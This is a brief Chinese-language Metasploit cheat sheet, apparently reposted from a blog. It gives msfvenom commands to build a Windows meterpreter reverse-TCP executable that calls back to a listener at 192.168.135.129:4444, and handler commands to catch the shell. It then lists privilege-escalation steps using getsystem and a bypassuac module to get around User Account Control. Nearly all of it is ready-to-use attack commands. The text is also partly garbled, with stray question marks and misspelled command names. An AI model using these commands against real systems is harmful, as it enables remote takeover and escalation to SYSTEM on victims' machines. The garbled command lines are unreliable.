一、 遠(yuǎn)控
????a) X86
????????msfvnom –p payload/windows/meterpreter/reverse_tcp ? ? ? ? ??# 32位
????????msfvnom –p payload/windows/x64/meterpreter/reverse_tcp????# 64位
????????i. LHOST=192.168.135.129 #指定反彈shell地址
????????ii. LPORT=4444 #指定反彈shell端口
????????iii. –f exe #生成文件類型
????????iv. –o /root/DeskTop/name.exe #生成路徑及文件名
二、 建立會(huì)話
????a) use exploit/multi/handler
? ? ????set payload windows/x64/meterpreter/reverse_tcp
????????set payload windows/meterpreter/reverse_tcp
????????i. set LHOST 192.168.135.129 #監(jiān)聽(tīng)地址
????????ii. set LPORT 4444 #監(jiān)聽(tīng)端口
????????iii. exploit / run #執(zhí)行
????????iv. background #掛起會(huì)話
三、 提權(quán)
????a) 命令(進(jìn)入會(huì)話)
????????getuid #獲取用戶id
????????getsystem #獲取sys權(quán)限
????????????1. –t 0 # 所有可用的技術(shù)(1,2,3)
????????????2. –t 1 # 命名管道模擬(在內(nèi)存/管理中)
????????????3. –t 2 # 被命名為管道模擬(下拉/admin)
????????????4. –t 3 # 標(biāo)記重復(fù)(在內(nèi)存/管理中)
????????search bypassuac
????b) 使用bypassuac(繞過(guò)用戶帳戶控制)

????????set payload windows/x64/meterprese/reverse_tcp
? ? ????set target 1 #設(shè)置目標(biāo)為x64,0:x86
本文連接:http://www.itdecent.cn/p/11284bb8e231
版權(quán)聲明:本文為簡(jiǎn)友原創(chuàng)文章,轉(zhuǎn)載必須寫明出處。